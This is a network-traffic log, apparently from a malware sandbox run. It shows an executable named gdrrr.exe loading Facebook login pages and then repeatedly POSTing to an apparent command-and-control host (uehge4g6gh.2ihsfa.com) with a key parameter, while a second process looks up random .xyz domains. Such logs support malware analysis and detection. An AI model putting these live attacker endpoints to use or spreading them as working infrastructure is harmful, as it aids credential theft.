report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src 'report-sample' *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com https://paywithmybank.com/ https://*.paywithmybank.com/;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net https://paywithmybank.com/ https://*.paywithmybank.com/;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src 'report-sample' *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com https://paywithmybank.com/ https://*.paywithmybank.com/;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net https://paywithmybank.com/ https://*.paywithmybank.com/;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(self), clipboard-write=(self), compute-pressure=(), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(self), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), private-state-token-issuance=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: unsafe-none
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: NaLiJB6liHl6lpH+ZnIhpmwlhbBRdfmzKaTz7wXLViVTkjCQkcJMInTdoAMJltxFr2J/jjKPNoYq11SaPFdJWw==
Date: Wed, 06 Nov 2024 13:28:46 GMT
X-FB-Connection-Quality: EXCELLENT; q=0.9, rtt=22, rtx=0, c=10, mss=1357, tbw=3228, tp=-1, tpl=-1, uplat=40, ullat=0
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 0
GET

https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2F

gdrrr.exe

Remote address:

163.70.151.35:443

Request

GET /login/?next=https%3A%2F%2Fwww.facebook.com%2F HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

Vary: Accept-Encoding
reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7434157715992460988", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7434157715992460988"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src 'report-sample' *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com https://paywithmybank.com/ https://*.paywithmybank.com/;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net https://paywithmybank.com/ https://*.paywithmybank.com/;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src 'report-sample' *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com https://paywithmybank.com/ https://*.paywithmybank.com/;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net https://paywithmybank.com/ https://*.paywithmybank.com/;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(self), clipboard-write=(self), compute-pressure=(), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(self), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), private-state-token-issuance=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: unsafe-none;report-to="coop_report"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: AXCVaioCuVAg2ohb6rHQLjcx9f39uwWqT33yqMZHtGVIvAEgUNtmLragG13XIvf0b00U3qOlarmTQXCV8+hsUA==
Date: Wed, 06 Nov 2024 13:28:46 GMT
Transfer-Encoding: chunked
X-FB-Connection-Quality: EXCELLENT; q=0.9, rtt=21, rtx=0, c=10, mss=1357, tbw=7767, tp=-1, tpl=-1, uplat=195, ullat=0
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
GET

https://www.facebook.com/

gdrrr.exe

Remote address:

163.70.151.35:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 302 Found

Location: https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2F
reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0"
report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src 'report-sample' *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com https://paywithmybank.com/ https://*.paywithmybank.com/;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net https://paywithmybank.com/ https://*.paywithmybank.com/;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src 'report-sample' *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com https://paywithmybank.com/ https://*.paywithmybank.com/;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net https://paywithmybank.com/ https://*.paywithmybank.com/;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(self), clipboard-write=(self), compute-pressure=(), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(self), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), private-state-token-issuance=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: unsafe-none
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: YgUAQzMNYuRYYvMcWbNoskHdkecQoQ++S3GYjN3yobVVaV+mUK3fR2MChVRtluWi2fo4TYXtuQASCgNx7UyDKA==
Date: Wed, 06 Nov 2024 13:28:48 GMT
X-FB-Connection-Quality: EXCELLENT; q=0.9, rtt=20, rtx=0, c=101, mss=1357, tbw=129526, tp=-1, tpl=-1, uplat=31, ullat=0
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 0
GET

https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2F

gdrrr.exe

Remote address:

163.70.151.35:443

Request

GET /login/?next=https%3A%2F%2Fwww.facebook.com%2F HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

Vary: Accept-Encoding
reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7434157725279738403", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7434157725279738403"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src 'report-sample' *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com https://paywithmybank.com/ https://*.paywithmybank.com/;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net https://paywithmybank.com/ https://*.paywithmybank.com/;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src 'report-sample' *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com https://paywithmybank.com/ https://*.paywithmybank.com/;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net https://paywithmybank.com/ https://*.paywithmybank.com/;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(self), clipboard-write=(self), compute-pressure=(), display-capture=(self), encrypted-media=(self), fullscreen=(self), gamepad=*, geolocation=(self), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(self), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(self), private-state-token-issuance=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=(self);report-to="permissions_policy"
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: unsafe-none
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: RYIeRQ8vgDxMhjPeOQHsyW/l7Aqs3blmIiiShfuMZQo/IQSG8s26tCcCAJ2kwgZqVRSDCO0hJQTZzc2cY6NiQg==
Date: Wed, 06 Nov 2024 13:28:48 GMT
Transfer-Encoding: chunked
X-FB-Connection-Quality: EXCELLENT; q=0.9, rtt=20, rtx=0, c=10, mss=1357, tbw=134068, tp=-1, tpl=-1, uplat=138, ullat=0
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
DNS

35.151.70.163.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.151.70.163.in-addr.arpa

IN PTR

Response

35.151.70.163.in-addr.arpa

IN PTR

edge-star-mini-shv-02-lhr6facebookcom
DNS

uehge4g6gh.2ihsfa.com

gdrrr.exe

Remote address:

8.8.8.8:53

Request

uehge4g6gh.2ihsfa.com

IN A

Response

uehge4g6gh.2ihsfa.com

IN A

13.248.169.48

uehge4g6gh.2ihsfa.com

IN A

76.223.54.146
GET

http://uehge4g6gh.2ihsfa.com/api/fbtime

gdrrr.exe

Remote address:

13.248.169.48:80

Request

GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: openresty
Date: Wed, 06 Nov 2024 13:28:49 GMT
Content-Type: text/html
Content-Length: 114
Connection: keep-alive
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
DNS

48.169.248.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.169.248.13.in-addr.arpa

IN PTR

Response

48.169.248.13.in-addr.arpa

IN PTR

a904c694c05102f30awsglobalacceleratorcom
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
DNS

62e4cb87e7e0fe29.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

62e4cb87e7e0fe29.xyz

IN A

Response
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
DNS

FAE6D2A1AC2748DB.xyz

6489A2274AE24900.exe

Remote address:

8.8.8.8:53

Request

FAE6D2A1AC2748DB.xyz

IN A

Response

FAE6D2A1AC2748DB.xyz

IN A

162.249.67.147
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
DNS

134.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.190.18.2.in-addr.arpa

IN PTR

Response

134.190.18.2.in-addr.arpa

IN PTR

a2-18-190-134deploystaticakamaitechnologiescom
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
